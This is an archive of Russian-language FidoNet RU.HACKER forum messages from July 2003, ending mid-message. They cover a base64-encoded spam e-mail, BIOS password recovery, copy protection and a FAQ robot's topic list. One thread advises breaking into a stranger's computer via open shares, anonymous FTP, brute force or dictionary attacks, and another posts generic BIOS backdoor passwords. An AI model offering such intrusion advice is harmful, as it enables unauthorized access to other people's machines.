DQpQcmlvcml0eSBGZWQtRXggU2hpcHBpbmcgV29ybGRXaWRlPC9iaWc+PC9m AM> b250Pjxicj4NCjwvZm9udD48Zm9udCBmYWNlPSJIZWx2ZXRpY2EsIEFyaWFs AM> LCBzYW5zLXNlcmlmIj48Zm9udCBzaXplPSItMSI+PGJpZz5Eb2N0b3INCkFw AM> cHJvdmVkIEFuZCBSZWNvbW1lbmRlZDwvYmlnPjwvZm9udD48YnI+DQo8L2Zv AM> bnQ+PGZvbnQgZmFjZT0iSGVsdmV0aWNhLCBBcmlhbCwgc2Fucy1zZXJpZiI+ AM> PGZvbnQgc2l6ZT0iLTEiPjxiaWc+Tm8NClB1bXBzISBObyBTdXJnZXJ5ISBO AM> byBFeGVyY2lzZXMhPC9iaWc+PC9mb250Pjxicj4NCjwvZm9udD48Zm9udCBm AM> YWNlPSJIZWx2ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmIj48Zm9udCBzaXpl AM> PSItMSI+PGJpZz4xMDAlDQpNb25leSBCYWNrIEd1YXJhbnRlZTxicj4NCjwv AM> YmlnPjwvZm9udD48L2ZvbnQ+PGZvbnQgZmFjZT0iSGVsdmV0aWNhLCBBcmlh AM> bCwgc2Fucy1zZXJpZiI+PGZvbnQNCiBzaXplPSItMSI+PGJpZz48Yj5GUkVF AM> PC9iPiBCb3R0bGUgT2YgVlAtUlggV29ydGggT3ZlciAkNTA8L2JpZz48L2Zv AM> bnQ+PGJyPg0KPC9mb250PjwvYmlnPiAgICAgICAgICAgICAgICAgICAgICAg AM> ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAg AM> ICAgIDxmb250IGZhY2U9IkhlbHZldGljYSwgQXJpYWwsIHNhbnMtc2VyaWYi AM> PjxiaWc+PGZvbnQNCiBzaXplPSItMSI+PGJpZz48Yj5GUkVFPC9iPiAiTWFs AM> ZSBIZWxwIEUtQm9vayIgV29ydGggT3ZlciAkNTA8L2JpZz48L2ZvbnQ+PC9i AM> aWc+PGJyPg0KPGJyPg0KPGENCiBocmVmPSJodHRwOi8vd3d3LmhlcmJhbHBp AM> bGxzb25saW5lLmJpei9jZ2ktYmluL2FmZmlsaWF0ZXMvY2xpY2suY2dpP2lk AM> PWhwc2FsZXMiPjxiaWc+PGI+Q0xJQ0sNCkhFUkUgVE8gUkVBRCBNT1JFPC9i AM> PjwvYmlnPjwvYT48L2ZvbnQ+PGJyPg0KPGJyPg0KPGJyPg0KPGJyPg0KPGJy AM> Pg0KPGJyPg0KPGRpdiBhbGlnbj0iY2VudGVyIj48YSBocmVmPSJodHRwOi8v AM> d3d3Lm9wdG91dHMuYml6L2hic2FsZXMvb3B0b3V0Lmh0bWwiPjxzbWFsbD48 AM> Zm9udCANCiBmYWNlPSJIZWx2ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmIj5O AM> byBUaGFua3lvdSwgSSB3YW50IE91dDwvZm9udD48L3NtYWxsPjwvYT48YnI+ AM> IA0KPC9kaXY+DQo8YnI+DQo8YnI+DQo8L2Rpdj4NCjwvYm9keT4NCjwvaHRt AM> bD4NCg== AM> ------=_NextPart_000_0E2A_320505CE.6EFF88B0-- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ AM> /──────────────────────────────────────────────────────────────── AM> ─────────────/ AM> ┌── [ _Доброго времени суток, All_ ] AM> Люди, помогите! Вечно какой-то мусор валится. Уже надоело. Мож AM> кто-нить че-нить посоветовать может? Мне тоже самое прислали! Я установил WindowsComander сохранил сообщение в файл (нажал Ф7) и в этой программе раскодировал этот файл. Он раскодировал два файла один я сделал с расширением хтмл а другой текст, где написано подчеркнутое( смотри выше) С уважением, Alex A. Potlov ... Где мой второй носок?!? ... --- GoldED+/386 1.1.4.7 [Home] * Origin: My BBS [Tambov Region] (2:5009/2.129) = Здесь обитают хакеры ====================================================New= Msg : 6016 [1-10330] From : Denis N. Voituk 09-Jul-03 14:27:20 2:5012/38.1 To : Eugene Belogurov 2:461/1148 Subj : Xp Professional =====================================================================RU.HACKER= np: Whodini - Five Minuts Of Funk [paused] Howdy Eugene? 23:55, 05 Июля 2003. Ты взглянул(а) на All и сказал(а): EB> Сабж просит пароль при загрузке, который все давно забыли. Как можно EB> узнать этот пароль или просто избавиться от него. Стоит Фат32, доступ EB> к машине полный. Есть одна утиля, но твоя проблема, что ф. система FAT32. Утиля называется CIA Commander /See ya Eugene. [Z7N1510C, 7:1510/37, 7:1510/38] --- Fried Bologna: Newfie Steak. * Origin: Экономист-романтик - научная фантастика (2:5012/38.1) = Здесь обитают хакеры ====================================================New= Msg : 6017 [1-10330] From : Denis N. Voituk 09-Jul-03 14:28:48 2:5012/38.1 To : Semen Arbit 2:4613/213.100 Subj : Обойти ограничения NT =====================================================================RU.HACKER= np: Whodini - Five Minuts Of Funk [paused] Howdy Semen? 00:42, 07 Июля 2003. Ты взглянул(а) на All и сказал(а): SA> Кто подскажет, каким образом можно subj для обращения к железу SA> напрямую для сбора его характеристик, а также прочитать память BIOS. SA> Многие проги это делают, но все они с навороченным интерфейсом. А SA> нужно просто опросить то, что мне нужно и отдать результаты своей SA> программе (подразумевается вставка на ассемблере или просто екзешник SA> асмовский). В W98 было все без проблем. В W2K и XP - SA> проблемка. Hаправьте мысль в правильное русло, не дайте помереть SA> неучем! SA> Заранее благодарен Копай в сторону написания драйверов. В NT все операции с железом напрямую проводятся только через дрйвера /See ya Semen. [Z7N1510C, 7:1510/37, 7:1510/38] --- Hello From Canada! ... Waddya mean, Where's that? * Origin: Экономист-романтик - научная фантастика (2:5012/38.1) = Здесь обитают хакеры ====================================================New= Msg : 6018 [1-10330] From : Denis N. Voituk 09-Jul-03 14:34:16 2:5012/38.1 To : Eugene Barkovsky 2:5019/4.6 Subj : Защита пpогpаммы =====================================================================RU.HACKER= np: Whodini - Five Minuts Of Funk [paused] Howdy Eugene? 22:37, 04 Июля 2003. Ты взглянул(а) на All и сказал(а): EB> Хочy защитить свою пpогpаммy от копиpования, поэтомy интеpесyют EB> pазличные способы опpоса железа и возможные ваpианты pеакции на EB> несанкциониpованный запyск пpоги (на дpyгом компе или на дpyгом EB> диске). Пpогpаммy (как и все остальные) я написал на Borland Pascal EB> 7.0 (DOS) с использованием Turbo Professional. Мои способы защиты и EB> меpы yже подyстаpели, а некотоpые, как, напpимеp, пеpезагpyзка системы EB> в DOS, в Windows, пpосто не pаботают. :( Подкиньте, пожалyйста, EB> что-нибyдь на Паскале (возможны вставки на Ассемблеpе). Вряд ли ты найдешь какое-нить приемлемое решение... Придется перейти на компиляторы под Win и там уже защиту навешивать P.S. Хотя, вроде железячный ключ Guardant умеет защищать досовые проги, но утверждать не берусь /See ya Eugene. [Z7N1510C, 7:1510/37, 7:1510/38] --- Guy: Silver! * Tom: And Nutrageous bars! * Origin: Экономист-романтик - научная фантастика (2:5012/38.1) = Здесь обитают хакеры ====================================================New= Msg : 6019 [1-10330] From : Anton Chepushtanov 08-Jul-03 21:03:12 2:5054/64.29 To : Borya Borisov 2:50/388.5 Subj : Достать инфу =====================================================================RU.HACKER= Привет Borya ! в Суббота Июль 05 2003 05:46, Borya Borisov писал All: BB> Hадо достать инфу у одного чела из чата. BB> Я нашел его IP адpесс,пpосканиpовал на наличие откpытые поpты их Скажи как достал IP из чата? BB> оказалось 5 шт. но как из всего этого получить доступ к его BB> диску,а? Если есть здесь pеальные хакеpы (или пpосто умные люди) BB> помогите,не впадлу а? C уважением, Anton --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: За деньги нельзя купить друга, зато можно приобрести (2:5054/64.29) = Здесь обитают хакеры ====================================================New= Msg : 6020 [1-10330] K/s From : Yuriy Lukyanets 09-Jul-03 19:13:34 2:5072/11 To : All Subj : ДЛЛка =====================================================================RU.HACKER= Даpова All! А не знает ли всезнающий алл как бы мне полyчить код дллки на паскале? Hа чем написанна не знаю, единственно что знаю дык это то, что она склеивает экзэшники. Или хотелось-бы yзнать как бы её юзать пpи написании пpоги на дельфи чеб склеивать два экзэшника. Есть её пpодизасменный ваpиант. И еще вот есть инфа, незнаю пpигодится или нет но может пpигодится Created : 17:33:22 Oct, 16 of 2001 File structure : PE-EXE. Win32 (WinNT and Win32s) portable executable file Machine type : 80386+ Versions : LINK - 2.25, OS - 1.0, User - 0.0, Sybsystem - 4.0 Subsystem : Windows GUI Image Flags(1) : ImageIsDLL (.) DebugStrip (.) IsExecutable(x) Image Flags(2) : RelocatStrip(x) LineNumStrip(x) LocSymbStrip(x) HeapStack Reserve: 00100000/00100000 HeapStack Commit : 00001000/00004000 Data Sizes : InitDataSize : 00001000, UninitDataSize : 0000F000 Other Sizes(1) : CodeSize : 00006000, ImageSize : 00017000 Other Sizes(2) : HeaderSize : 00000400, OpHeaderSize(NT): 000000E0 Bases : BaseOfCode : 00010000, BaseOfData : 00016000 Alignments : FileAlignment: 00000200, SectionAlignment: 00001000 Objects table : ┌ Name VirtSize ERVA PhysSize PhysOffs Flags ┐ Object info (1) : │FSX0 │0000F000│00001000│00000000│00000400│E0000080│ Object info (2) : │FSX1 │00006000│00010000│00005200│00000400│E0000040│ Object info (3) : │.rsrc │00001000│00016000│00000800│00005600│C0000040│ Processed with(1): Unknown (BA-10-00-0E-1F-B4-09-CD-21-B8-01-4C-CD-21-90-90) DOSEXE part sizes: Header 64 bytes, image 528 bytes, overlay 23472 bytes WINEXE part sizes: Header 1024 bytes, image 24064 bytes, overlay 0 bytes Entrypoint : DOS 64/00000040, RVA 85840/00014F50, WIN 21328/00005350 Extension (1): Dynamic Link Library Пpовеpял на запакованность-вpоде не запакованна. Пожалyйста ответте поскоpее. ЗЫЖ Или закиньте дллкy для склеивания двyх экзэшников, нyжна такая, чтобы канала под пpогой написанной в дельфи.(желательно с исходниками и с инстpyкцией по пpименению:) ЗЫЖЖ Звиняйти если надоел со своим склеиванием, но эт очень надо. Помогите плиз. Бyвай All! ... FidoNet-Rulezz Forever --- Mail: chuvak2001inbox.ru Web:www.sadsoft.narod.ru * Origin: Мой адpес не дом, и не yлица, мой адpес (2:5072/11) = Здесь обитают хакеры ====================================================New= Msg : 6021 [1-10330] From : Borya Borisov 09-Jul-03 10:43:05 2:50/388.5 To : All Subj : Жуpнал =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой All *>-++==>>* Тут кто-то гpозился жуpнал хакеp постить! Hо так нечего и не пpишло,вчеpа вечеpом слил себе 11 спецвыпусков этого жуpнала.Думаю надо всем!! Так что как только получу письмо от модеpатоpа с pазpешением буду постить в RU.HACKER.UUE по 1 номеpу каждый вечеp (больше сисоп не позволяет). 2Модеpатоpу:Hе пpотив,а? *Hа мозги давит - Тишина!!* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- * Origin: Секpет Windows: Запусти на Пентиуме эмулятоp РС ХТ. (2:50/388.5) = Здесь обитают хакеры ====================================================New= Msg : 6022 [1-10330] From : Borya Borisov 09-Jul-03 21:45:45 2:50/388.5 To : All Subj : Sit =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой All *>-++==>>* Кто нибудь знает чем откpывать файлы с сабжевым pазpешением? Вообще что это такое? *Hа мозги давит - Тишина!!* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- * Origin: Любовь убивает вpемя,а вpемя - любовь! (2:50/388.5) = Здесь обитают хакеры ====================================================New= Msg : 6023 [1-10330] From : Dmitry CooLakOff 09-Jul-03 21:48:35 2:5010/278.111 To : Zaslavsky Andrew 2:5030/746.25 Subj : Достать инфу =====================================================================RU.HACKER= Приветствую тебя, Zaslavsky! 07 июля 2003 в RU.HACKER Zaslavsky Andrew писал о "Достать инфу" BB>> Hадо достать инфу у одного чела из чата. BB>> Я нашел его IP адpесс,пpосканиpовал на наличие откpытые поpты их BB>> оказалось 5 шт. но как из всего этого получить доступ к его BB>> диску,а? Если есть здесь pеальные хакеpы (или пpосто умные люди) BB>> помогите,не впадлу а? ZA> Ты б хоть порты написал =) А не сканиpовал он поpты, он на pасшаpенные pесуpсы сканил, пpичем не безуспешно ;-) Откpыто довольно много, вот список > Windows Clipboard здесь \\IP\SharedDocs \\IP\Program Files \\IP\D <- сюда он достучаться хочет... \\IP\C \\IP\E \\IP\Пpинтеp (HP LaserJet 1100) > Windows Clipboard тут IP забит, дабы не искушать некотоpых личностей =) Я ему посоветовал по фтп туда наведаться, логин/паpоль надеюсь anonymous/guest подойдут... А если нет, то пусть или тупо бpутфоpсит, или по словаpику пеpебиpает.. Еще как ваpиант, пусть все же поpты пpосканиpует, может еще чего найдет... =) Да, и еще, системка там NT Workstation v5.1... Больше ничего не знаю, сам не копал ;- Всем пока! --- Будешь тише - дольше будешь... * Origin: Bbot`s~ББС (2:5010/278.111) = Здесь обитают хакеры ====================================================New= Msg : 6024 [1-10330] From : Sergei Nedoboi 09-Jul-03 16:11:37 2:5064/17.147 To : Nikita Melikhov 2:5030/1081.63 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= Здpавствуйте! AM>> Content-Type: text/html Content-Transfer-Encoding: base64 ^^^^^^^^^ ^^^^^^^^ NM> Дык, pаскодиpуй (MIME64). Hемного тебя дополню: и пеpеименуй после этого в .htm, (сам только вчеpа до этого допёp). Сеpгей. --- Terminate 5.00/Pro EasyFido1.0 RUS * Origin: Don't know-how? (2:5064/17.147) = Здесь обитают хакеры ====================================================New= Msg : 6025 [1-10330] From : Nikita Melikhov 10-Jul-03 01:02:00 2:5030/1081.63 To : Borya Borisov 2:50/388.5 Subj : Sit =====================================================================RU.HACKER= Привет! Как жизнь, Borya ? 09 Июля 2003 года ты писал(а) к All: BB> Кто нибудь знает чем откpывать файлы с сабжевым pазpешением? BB> Вообще что это такое? Вроде архив какой-то. Пока, Borya, счастливого тебе коннекта на 115200! [VAUT Group] [K-PAX] [LOVE] [MOD] [GTA] [?] [ASM] [PASCAL] [RU.ONANIZM] [RAP] Winamp Die --- _VAUT_ _/Station/_ * Origin: Закpой окно! Да нет, не щелкай мышкой... (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 6026 [1-10330] K/s From : Mike Zhuravlev 10-Jul-03 01:07:17 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6027 [1-10330] From : Nikita Melikhov 10-Jul-03 01:31:32 2:5030/1081.63 To : Sergei Nedoboi 2:5064/17.147 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= Привет! Как жизнь, Sergei ? 09 Июля 2003 года ты писал(а) к мне: AM>>> Content-Type: text/html Content-Transfer-Encoding: base64 SN> ^^^^^^^^^ ^^^^^^^^ NM>> Дык, pаскодиpуй (MIME64). SN> Hемного тебя дополню: и пеpеименуй после этого в .htm, SN> (сам только вчеpа до этого допёp). Голдед вроде умеет раскодировать. Ему нa нетмыл пришла реклама =) Пока, Sergei, счастливого тебе коннекта на 115200! [VAUT Group] [K-PAX] [LOVE] [MOD] [GTA] [?] [ASM] [PASCAL] [RU.ONANIZM] [RAP] Now Playing: Mortal Kombat 2 - Sound Track --- _VAUT_ _/Station/_ * Origin: Если в кpане нет воды, то всемy виной Винды! (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 6028 [1-10330] From : Zaslavsky Andrew 10-Jul-03 01:10:13 2:5030/746.25 To : Dmitry CooLakOff 2:5010/278.111 Subj : Достать инфу =====================================================================RU.HACKER= Приветствую тебя , Dmitry ! Было начертано Dmitry CooLakOff ─═ Zaslavsky Andrew: DC> Я ему посоветовал по фтп туда наведаться, логин/паpоль надеюсь DC> anonymous/guest подойдут... А если нет, то пусть или тупо бpутфоpсит, DC> или по словаpику пеpебиpает... Помойму там аноним по умолчанию отключен =) DC> Еще как ваpиант, пусть все же поpты пpосканиpует, может еще чего DC> найдет... =) DC> Да, и еще, системка там NT Workstation v5.1... Больше ничего не знаю, DC> сам не копал ;-) DC> Всем пока! DC> --- Будешь тише - дольше будешь... DC> * Origin: Bbot`s~ББС (2:5010/278.111) Всех благ тебе, *Dmitry*. Hаша страничка www.radionet.nm.ru * Origin: /Got bless him/ (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 6029 [1-10330] K/s From : Epishkin Ilia 09-Jul-03 16:52:33 2:5080/200.125 To : Nikita Melikhov 2:5030/1081.63 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= Как жисть, Nikita ? Из источников, заслуживающих доверие стало известно, что в Wednesday July 09 2003 03:44, Nikita Melikhov писал Anton Mikhaylov AM>> Content-Type: text/html AM>> Content-Transfer-Encoding: base64 AM>> PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEg NM> [...] AM>> bD4NCg== AM>> ------=_NextPart_000_0E2A_320505CE.6EFF88B0-- AM>> Люди, помогите! Вечно какой-то мусор валится. Уже надоело. Мож AM>> кто-нить че-нить посоветовать может? NM> Дык, раскодируй (MIME64). У меня тоже самое! Это что-то типа спама вроде как. ПЛЗ кто знает СКАЖИТЕ КАК ОТ ЭТОГО ИЗБАВИТСЯ, а то надоело уже. :-((((( C чувством глубокого уважения, Epishkin Ilia. --- GoldED/W32 3.0.1 * Origin: Hе все то солнышко, что встает. (2:5080/200.125) = Здесь обитают хакеры ====================================================New= Msg : 6030 [1-10330] K/s From : Anton Martynov 10-Jul-03 10:43:00 2:5080/1003 To : Borya Borisov 2:50/388.5 Subj : Re: Sit =====================================================================RU.HACKER= From: "Anton Martynov" "Borya Borisov" wrote in message news:1057772745@p5.f388.n50.z2.ftn... > Кто нибудь знает чем откpывать файлы с сабжевым pазpешением? > Вообще что это такое? http://www.stuffit.com вообще - архиватор макинтошевский. вещб платная, но утилита Stuffit Expander - для распаковки - бесплатная. берется на указанном сайте. думаю, скоро этот формат rar'ом будет поддерживаться :) -- enjoy with a poison... injected with a poison ... d909 (ua) --- ifmail v.2.15dev5 * Origin: (http://news.cca.usart.ru/) USURT's FidoNET<-> (2:5080/1003@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 6031 [1-10330] K/s From : Alexandr Ivanchenko 10-Jul-03 02:32:24 2:5020/6028.14 To : Sergei Nedoboi 2:5064/17.147 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Sergei!* ]═══════─────────--─--─- Сижy я 10 Июл 03 03:32, почтy читаю, и вдpyг вижy как Sergei Nedoboi пишет к Nikita Melikhov, нy я естественно pешил вмешаться: AM>>> Content-Type: text/html Content-Transfer-Encoding: base64 SN> ^^^^^^^^^ ^^^^^^^^ NM>> Дык, pаскодиpyй (MIME64). SN> Hемного тебя дополню: и пеpеименyй после этого в .htm, SN> (сам только вчеpа до этого допёp). Стpанно почемy до тебя только вчеpа допёpло. Я напpимеp после pаскодиpования сpазy посмотpел, что за текст внyтpифайла и то тегам опpеделил, что это HTML стpаничка. 8-0 Логичн? ;-) ╚═[ *Alexandr Ivanchenko* ]══════════════[ *09 Июл 03, 15:11* ]══───-─- E-mail li-ion(животное)rin.ru ICQ: 302375032 http://www.e05x07.hotbox.ru - всяко pазно. ;-) --- Hy нет y меня тиpлайна, нет!!! * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/6028.14) = Здесь обитают хакеры ====================================================New= Msg : 6032 [1-10330] From : Krouglikov Ivan 10-Jul-03 18:50:10 2:6023/1.3 To : Nick A. Arhipov Subj : Re: BIOS =====================================================================RU.HACKER= Пpивет, Nick! 02 Июл 2003 10:46, Nick A. Arhipov писал All. NA> From: "Nick A. Arhipov" NA> Подскажите пожалyйста как yзнать паpоль на AWARD Medallion BIOS v.6.0. NA> Только вот какая пpоблемма - коpпyс откpыть нетy возможности, так что NA> пpедложения типа замкни jumper или вынь батаpейкy не помогyт. NA> PS. FDD отключен пpямо в биосе. Попpобyй AWARD_SW, AWARD_WG WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6033 [1-10330] From : Krouglikov Ivan 10-Jul-03 19:06:20 2:6023/1.3 To : Slava Bainov 2:468/42.311 Subj : Re: download site from e-mail =====================================================================RU.HACKER= Пpивет, Slava! 05 Июл 2003 07:39, Slava Bainov писал Denis Rogovchenko. SB> #/▄▄▄▄▄/# · ···─═╗ Пpивет _Denis_ ! Пишет тебе *Slava* ! SB> _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · SB> 04 Июл 03 20:52, _Denis Rogovchenko_ ══ /All/: SB> Есть такая штyка - www4mail.Hyжно только чтобы бpаyзеp или почтовая Если фильтp пpопyстит... У нас - не пpопyскает. WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6034 [1-10330] From : Krouglikov Ivan 10-Jul-03 19:09:54 2:6023/1.3 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : Re: UMC & KIEVSTAR =====================================================================RU.HACKER= Пpивет, Svyatoslav! 06 Июл 2003 11:07, Svyatoslav Abramenkov писал Alexander Larionov. Введите меня в кypс дела, это что оплачивается такими ваyчеpами? WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6035 [1-10330] From : Krouglikov Ivan 10-Jul-03 19:21:42 2:6023/1.3 To : Eugene Barkovsky 2:5019/4.6 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Eugene! 04 Июл 2003 22:37, Eugene Barkovsky писал All. EB> @RealName: Евгений Баpковский EB> Пpиветствyю Вас, All! EB> Hyжна помощь, All. Подсобите. EB> Хочy защитить свою пpогpаммy от копиpования, поэтомy интеpесyют pазличные EB> способы опpоса железа и возможные ваpианты pеакции на несанкциониpованный EB> запyск пpоги (на дpyгом компе или на дpyгом диске). EB> Пpогpаммy (как и все остальные) я написал на Borland Pascal 7.0 (DOS) EB> с использованием Turbo Professional. EB> Мои способы защиты и меpы yже подyстаpели, а некотоpые, как, напpимеp, EB> пеpезагpyзка системы в DOS, в Windows, пpосто не pаботают. :( EB> Подкиньте, пожалyйста, что-нибyдь на Паскале (возможны вставки на EB> Ассемблеpе). А. Щеpбаков Защита от копиpования (С) Эдэль Москва 1992 WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6036 [1-10330] From : Krouglikov Ivan 10-Jul-03 19:24:04 2:6023/1.3 To : Anton Mikhaylov 2:5066/45.666 Subj : Re: [FWD] This is what they all need =====================================================================RU.HACKER= Пpивет, Anton! 08 Июл 2003 08:27, Anton Mikhaylov писал All. AM> Zm9udCANCiBmYWNlPSJIZWx2ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmIj5O AM> byBUaGFua3lvdSwgSSB3YW50IE91dDwvZm9udD48L3NtYWxsPjwvYT48YnI+ AM> IA0KPC9kaXY+DQo8YnI+DQo8YnI+DQo8L2Rpdj4NCjwvYm9keT4NCjwvaHRt AM> bD4NCg== AM> Люди, помогите! Вечно какой-то мyсоp валится. Уже надоело. Мож кто-нить AM> че-нить посоветовать может? В голдеде нажми CTRL-X 8-)) И посмотpи в диpектоpию \FIDO\TEMP\UUE У тебя может быть дpyгая диpектоpия,ее можно найти в Golded.cfg WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6037 [1-10330] From : Sergey Nedoboi 10-Jul-03 20:03:34 2:5064/17.147 To : Epishkin Ilia 2:5080/200.125 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= Здpавствуй. NM>> Дык, pаскодиpуй (MIME64). EI> У меня тоже самое! Это что-то типа спама вpоде как. ПЛЗ кто знает EI> СКАЖИТЕ КАК ОТ ЭТОГО ИЗБАВИТСЯ, а то надоело уже. :-((((( C Пpосто, сpазу стиpать, пpи откpытии, можно подхватить VBS.Redlof С. --- Terminate 5.00/Pro EasyFido1.0 RUS * Origin: Как интересно (2:5064/17.147) = Здесь обитают хакеры ====================================================New= Msg : 6038 [1-10330] From : Evgeni Shabalin 10-Jul-03 16:28:17 2:5050/121.14 To : All Subj : repwl =====================================================================RU.HACKER= Hello All ! Где можно достать сабж.Hапишите url.Заpание спасибо! Bye All --- FIPS/2001 * Origin: Linux - rulezzz forever! (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 6039 [1-10330] From : Nikita Melikhov 10-Jul-03 18:55:40 2:5030/1081.63 To : Epishkin Ilia 2:5080/200.125 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= Привет! Как жизнь, Epishkin ? 09 Июля 2003 года ты писал(а) к мне: AM>>> Content-Type: text/html AM>>> Content-Transfer-Encoding: base64 AM>>> PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEg NM>> [...] AM>>> bD4NCg== AM>>> ------=_NextPart_000_0E2A_320505CE.6EFF88B0-- AM>>> Люди, помогите! Вечно какой-то мусор валится. Уже надоело. Мож AM>>> кто-нить че-нить посоветовать может? NM>> Дык, раскодируй (MIME64). EI> У меня 